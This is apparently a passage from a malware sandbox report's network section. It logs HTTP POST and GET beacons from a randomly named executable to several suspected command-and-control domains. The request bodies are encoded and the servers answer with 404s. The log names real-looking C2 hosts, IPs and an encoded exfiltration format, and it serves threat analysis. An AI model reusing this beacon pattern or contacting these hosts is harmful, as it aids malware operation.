                                                                                                                            Dec 3, 2024 14:39:37.125868082 CET851OUTPOST /7a5n/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.bootleggersrt.online
                                                                                                                            Referer: http://www.bootleggersrt.online/7a5n/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 66 34 36 6e 46 78 6e 68 55 54 53 52 72 7a 47 2b 66 54 64 42 47 63 79 6e 42 46 4d 77 48 31 4b 31 51 37 54 75 61 69 50 62 57 32 2b 6c 4f 32 65 4b 2f 37 75 54 52 4d 38 56 57 33 71 61 33 77 75 71 63 46 48 38 49 4d 33 6a 68 48 6d 39 43 68 51 68 33 4b 48 78 56 70 34 70 4e 39 68 41 53 66 45 6b 4b 41 5a 57 54 74 6e 34 54 56 5a 69 4e 58 48 63 61 53 78 2b 2f 30 50 33 5a 37 66 5a 58 50 6f 36 73 2f 36 73 46 4f 53 4c 69 48 59 53 43 53 66 75 6d 72 32 76 6f 67 43 73 6d 77 68 6a 42 36 4e 67 6a 74 61 7a 72 51 52 63 73 76 52 32 57 65 6c 65 52 6e 47 32 79 66 63 48 65 39 58 33 5a 6f 72 6f 73 45 6e 78 47 37 59 39 49 67 52 6f 30 78 56 42 47 4f 77 6e 67 46 7a 5a 2b 72 34 79 47 57 56 51 63 67 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=f46nFxnhUTSRrzG+fTdBGcynBFMwH1K1Q7TuaiPbW2+lO2eK/7uTRM8VW3qa3wuqcFH8IM3jhHm9ChQh3KHxVp4pN9hASfEkKAZWTtn4TVZiNXHcaSx+/0P3Z7fZXPo6s/6sFOSLiHYSCSfumr2vogCsmwhjB6NgjtazrQRcsvR2WeleRnG2yfcHe9X3ZorosEnxG7Y9IgRo0xVBGOwngFzZ+r4yGWVQcg==
                                                                                                                            Dec 3, 2024 14:39:38.497212887 CET314INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:38 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            15192.168.2.64999331.31.196.17805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:39.793891907 CET1864OUTPOST /7a5n/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.bootleggersrt.online
                                                                                                                            Referer: http://www.bootleggersrt.online/7a5n/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 66 34 36 6e 46 78 6e 68 55 54 53 52 72 7a 47 2b 66 54 64 42 47 63 79 6e 42 46 4d 77 48 31 4b 31 51 37 54 75 61 69 50 62 57 32 32 6c 4f 48 2b 4b 2b 61 75 54 44 38 38 56 4e 58 71 62 33 77 76 71 63 46 76 34 49 4d 71 57 68 46 75 39 45 43 59 68 2f 62 48 78 66 70 34 70 47 64 68 42 64 2f 46 77 4b 42 70 53 54 70 44 34 54 56 5a 69 4e 56 66 63 4e 51 4a 2b 35 30 50 77 4a 72 66 56 47 66 70 54 73 38 4c 54 46 4f 57 39 69 7a 6b 53 62 79 50 75 71 35 65 76 6a 67 43 69 6e 77 68 37 42 36 49 77 6a 74 47 46 72 51 6c 69 73 74 4e 32 47 62 41 38 47 6b 36 74 67 66 41 62 41 76 47 53 64 76 33 61 72 31 72 61 4e 72 77 4f 48 54 55 66 36 55 70 65 46 38 46 68 74 6b 69 33 2b 64 6f 69 54 47 49 55 4a 34 4e 67 70 76 61 61 2f 33 75 54 77 57 68 74 42 4c 56 73 42 79 4e 70 68 64 73 67 54 6d 7a 52 51 48 76 65 45 52 6f 65 44 52 72 6c 79 73 46 74 63 44 33 7a 46 51 37 6e 33 52 4a 35 58 41 4b 37 52 6e 4f 56 5a 31 38 79 6c 79 58 45 52 69 53 34 71 53 7a 69 7a 58 70 35 61 59 61 75 71 6d 69 56 59 56 57 4b 67 72 46 70 65 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=f46nFxnhUTSRrzG+fTdBGcynBFMwH1K1Q7TuaiPbW22lOH+K+auTD88VNXqb3wvqcFv4IMqWhFu9ECYh/bHxfp4pGdhBd/FwKBpSTpD4TVZiNVfcNQJ+50PwJrfVGfpTs8LTFOW9izkSbyPuq5evjgCinwh7B6IwjtGFrQlistN2GbA8Gk6tgfAbAvGSdv3ar1raNrwOHTUf6UpeF8Fhtki3+doiTGIUJ4Ngpvaa/3uTwWhtBLVsByNphdsgTmzRQHveERoeDRrlysFtcD3zFQ7n3RJ5XAK7RnOVZ18ylyXERiS4qSzizXp5aYauqmiVYVWKgrFpeUtBXq37AL11UzCqtLWhDLh89EIpZmg0Bol/da8KYF6mdMO8VzMJAOF8BxYDh4poJD8tmoSwSvO4kGnurzaxOfZnU2N/nSEaQuH7dMk5UwpiY8YindFh5YdgYcXUVKa2F/ExvJ8/k8fwaR4JWlytPu8TxzYNe1zVC6sXjdDRNFY3BxOudu6VNrWy2voDW9CJDNlvXXMexS8V7ayhJX876ToYsFiMDljl/Gnnu7V0sP0qimCNVh5D6Eirf+8CyMvqV70RrFrMYhxAigHskIwGKvgKdvV90ZP3L81aJh67End4Z7EbnLNSBLT4oqL2c503oxMh8j+/3bcCZdhY5bxo/4CMwieuJLD+GSEnXKL6j9LSuJLivTepdYo2SuBKVRF/Vas7cY5wKnIydNpYIb2AaspqNpDUCUyZjfkrX4bG7p711XFI3e5HP/1g5uE1ZCenu4dl41kPSps2It4OakcMIkmnPXLTNZjsxQR9Kof8f9Kzd6o4Vq26loTvQrN+H6r12mb7YEiR4nitiq5qAZIOFFaePpZzOefslF/7/pLYC1jZTZBw/TGm+bIJyBrQca3NuAWdXwllC+B3up1njNqSItvwq5+ji6NX0lv0b21IAVzOBPuSSucpNcYhBrA024/J4P4X4IAiPfAwFbQNdWSrcJZKi9oYm5uDOnx [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:39:41.197916985 CET314INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:40 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            16192.168.2.65000031.31.196.17805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:42.464874029 CET560OUTGET /7a5n/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=S6SHGGXXYwmAu16pai4DUvmkZVlUR2XiLpaLWC7pZkuSLECp9ozWQ9UIc1yk4ybjQU73M8zKwnu8ByEcz6/kZr88F4N+VuUzEk15V8/AegthLE/UMwpBwzbtc6DqGvxT1O3KEY4= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.bootleggersrt.online
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:39:43.824863911 CET330INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.650020130.185.109.77805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:49.922200918 CET812OUTPOST /q2b2/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.lgdiamonds.info
                                                                                                                            Referer: http://www.lgdiamonds.info/q2b2/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 70 2b 6a 6b 6b 72 65 61 77 7a 4b 6e 5a 41 49 4e 32 52 32 2b 51 74 4e 36 52 6f 6f 44 72 42 65 6f 33 65 53 33 73 6a 2f 54 59 64 68 6e 37 32 61 4e 63 57 79 38 61 4a 52 77 6c 43 6a 57 31 58 59 53 6f 44 67 32 2f 72 6f 77 4a 61 48 54 6d 71 41 32 67 74 4e 6b 65 67 63 48 45 5a 5a 31 53 2f 45 6f 45 38 58 2f 37 36 63 78 4a 76 37 34 6b 74 69 44 4d 79 47 7a 63 77 52 6d 59 54 54 2f 65 71 42 38 43 49 54 41 6f 56 44 6e 54 6b 32 4a 50 33 77 59 34 66 68 30 71 5a 72 6a 54 54 46 63 45 61 32 48 58 42 6a 46 4a 33 65 79 76 63 53 70 30 55 61 42 6d 44 64 41 4a 6d 6f 43 72 58 35 45 78 45 30 4f 6d 76 6b 74 68 4d 2f 63 66 63 6b 5a
                                                                                                                            Data Ascii: u6nP_F48=p+jkkreawzKnZAIN2R2+QtN6RooDrBeo3eS3sj/TYdhn72aNcWy8aJRwlCjW1XYSoDg2/rowJaHTmqA2gtNkegcHEZZ1S/EoE8X/76cxJv74ktiDMyGzcwRmYTT/eqB8CITAoVDnTk2JP3wY4fh0qZrjTTFcEa2HXBjFJ3eyvcSp0UaBmDdAJmoCrX5ExE0OmvkthM/cfckZ
                                                                                                                            Dec 3, 2024 14:39:51.245121956 CET322INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:51 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.650026130.185.109.77805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:52.590816975 CET836OUTPOST /q2b2/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.lgdiamonds.info
                                                                                                                            Referer: http://www.lgdiamonds.info/q2b2/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 70 2b 6a 6b 6b 72 65 61 77 7a 4b 6e 66 51 59 4e 6c 69 65 2b 46 64 4e 35 53 6f 6f 44 69 68 65 53 33 66 75 33 73 69 37 39 59 72 5a 6e 37 58 4b 4e 66 55 4b 38 5a 4a 52 77 71 69 6a 66 34 33 59 4d 6f 44 38 2b 2f 71 55 77 4a 61 54 54 6d 6f 49 32 67 2b 31 6c 65 77 63 4a 50 35 5a 7a 63 66 45 6f 45 38 58 2f 37 36 59 50 4a 72 58 34 6c 64 53 44 65 47 53 38 52 51 52 6c 4d 44 54 2f 55 36 42 34 43 49 53 76 6f 55 76 65 54 6d 4f 4a 50 32 41 59 34 4e 5a 31 6a 5a 72 35 63 7a 45 62 4e 71 4b 4a 54 53 65 58 44 48 4b 77 32 37 4b 78 31 69 48 62 36 77 64 6a 62 32 49 41 72 56 68 32 78 6b 30 6b 6b 76 63 74 7a 62 7a 37 51 6f 42 36 46 78 48 42 74 75 65 69 53 56 46 78 71 37 44 77 50 50 67 77 75 51 3d 3d
                                                                                                                            Data Ascii: u6nP_F48=p+jkkreawzKnfQYNlie+FdN5SooDiheS3fu3si79YrZn7XKNfUK8ZJRwqijf43YMoD8+/qUwJaTTmoI2g+1lewcJP5ZzcfEoE8X/76YPJrX4ldSDeGS8RQRlMDT/U6B4CISvoUveTmOJP2AY4NZ1jZr5czEbNqKJTSeXDHKw27Kx1iHb6wdjb2IArVh2xk0kkvctzbz7QoB6FxHBtueiSVFxq7DwPPgwuQ==
                                                                                                                            Dec 3, 2024 14:39:53.834543943 CET322INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:53 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.650033130.185.109.77805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:55.266241074 CET1849OUTPOST /q2b2/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.lgdiamonds.info
                                                                                                                            Referer: http://www.lgdiamonds.info/q2b2/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Raw: 75 36 6e 50 5f 46 34 38 3d 70 2b 6a 6b 6b 72 65 61 77 7a 4b 6e 66 51 59 4e 6c 69 65 2b 46 64 4e 35 53 6f 6f 44 69 68 65 53 33 66 75 33 73 69 37 39 59 72 52 6e 36 6e 57 4e 46 31 4b 38 59 4a 52 77 6a 43 6a 61 34 33 5a 4a 6f 44 30 36 2f 71 59 4b 4a 59 72 54 6e 4b 77 32 77 66 31 6c 56 77 63 4a 41 5a 5a 32 53 2f 46 6f 45 38 6e 37 37 36 49 50 4a 72 58 34 6c 62 65 44 64 53 47 38 54 51 52 6d 59 54 54 7a 65 71 42 51 43 49 71 56 6f 55 72 4f 53 56 47 4a 42 31 34 59 35 2b 68 31 69 35 72 2f 51 54 45 35 4e 71 48 4c 54 53 43 54 44 45 58 56 32 38 36 78 35 6b 4b 69 71 52 42 33 48 55 67 47 39 53 52 31 31 79 77 77 6d 76 41 44 33 6f 66 30 65 39 6b 57 4d 46 48 69 6b 75 48 5a 61 6c 46 35 6c 37 75 55 62 72 67 67 34 6a 4f 69 6b 74 6c 62 62 6a 4e 79 75 62 37 6a 77 38 63 79 34 76 44 71 2b 4c 6a 4b 61 38 4e 68 51 35 59 45 35 38 2f 4f 6d 72 53 49 56 77 4a 68 76 6c 4d 71 6f 6c 53 4f 77 46 57 53 35 33 62 42 56 74 45 79 47 64 36 32 5a 5a 6b 72 44 50 35 50 2f 4e 46 71 6b 57 50 31 57 45 6f 37 2b 74 78 52 52 7a 32 6d 2b 32 6b 54 67 [TRUNCATED]
                                                                                                                            Data Ascii: u6nP_F48=p+jkkreawzKnfQYNlie+FdN5SooDiheS3fu3si79YrRn6nWNF1K8YJRwjCja43ZJoD06/qYKJYrTnKw2wf1lVwcJAZZ2S/FoE8n776IPJrX4lbeDdSG8TQRmYTTzeqBQCIqVoUrOSVGJB14Y5+h1i5r/QTE5NqHLTSCTDEXV286x5kKiqRB3HUgG9SR11ywwmvAD3of0e9kWMFHikuHZalF5l7uUbrgg4jOiktlbbjNyub7jw8cy4vDq+LjKa8NhQ5YE58/OmrSIVwJhvlMqolSOwFWS53bBVtEyGd62ZZkrDP5P/NFqkWP1WEo7+txRRz2m+2kTg4j9b9n9wRjlzlB5R1CQhFta69zH1xK7CubHhMmdvCWfTcmnnk2lr+ncSNT+xUVjPh4n2h6rdw8NUJ/ZCbMB4g8rZOdGred0BVCBdOwm3H5K2eYd7mxRax/P14sF2JWS9UO1HN4eUV4bjVyLvnbefGnztUfZObKXxL7wSDaciIlrFl6zrISu6MLtK2CJEzFgAI5JUDtA4Z3p186Lwi1nUM3gnenU7/wBsFBTywB2FqrxTDOn9793eONuZ8rvd6bZxIJKgZn2h0XqGqlBCbeEFezYE8kcMuUJRjlb3CzHzrBHaJV1SplopYkvgo5EAt0rJKGjMiWm6eHPj0o43MxUpvLg0wXbHlZoAldnysTNFdyWiTj0SwD/h9rvHxgh3ymlR7pBd+uwPa6jUnluKdNvZu6QMfjDuLpGRjRmpf64wa1eIEEjnSI4R+NCdBflltXnq53pOWoglIl5ZSE7+XvfKovEu7SEIQctHaBYhaQli7U3HaqCuG+o6fWrR0PK2Lg5izPRHtmt5ZkZu1ER7uP0oUzQ/7z6tySdC1yUOYUXQNanEqoXThhLVbqnfHU/mQjzKimTB2Wcvpi7YAacjtMAL8j9LNo6UZBeR4aWg1PhySS4bQu8AyHNbH+c5exOSffPV7kbrV6Z2z89N2GbVFjCNeLeEqBgvnyTpLl [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:39:56.580390930 CET322INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:56 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            20192.168.2.650034130.185.109.77805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:39:57.928770065 CET555OUTGET /q2b2/?u6nP_F48=k8LEnfe2wzSPKnd+4j+FHsRof8pP0SbHpdiozyXUU8wG1G+DI2HbB69btAHUx0UZtSY5up0HFKX7joYW5N4IdT0eHsdsbM4tAcjV6Y0GGqKWlvaVbVOKX21NPAfOVONObcqqhCU=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.lgdiamonds.info
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:39:59.180696011 CET317INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.6.2
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:58 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 168
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            21192.168.2.650035172.104.82.74805868C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 3, 2024 14:40:08.046125889 CET818OUTPOST /plyd/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.funnystory.online
                                                                                                                            Referer: http://www.funnystory.online/plyd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
